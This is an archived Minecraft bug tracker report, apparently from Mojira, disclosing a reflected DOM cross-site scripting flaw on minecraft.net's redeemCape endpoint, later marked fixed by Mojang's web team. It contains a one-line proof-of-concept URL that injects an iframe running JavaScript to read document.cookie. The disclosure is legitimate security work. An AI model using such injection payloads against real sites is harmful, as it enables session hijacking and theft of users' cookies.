Mojira Archive
WEB-1209

Reflected XSS on minecraft.net

Hello!

 

I have found reflected DOM xss on minecraft.net on redeemCape endpoint

 

PoC: https://minecraft.net/pl-pl/profile/redeemCape/%3Ciframe%20src=javascript:alert(document.cookie)%3E

 

Greetings

Fixed

DrBrix

[Mojang] Web Team

2019-01-25, 10:22 PM

2019-03-20, 09:49 PM

2019-03-08, 08:07 AM

1

1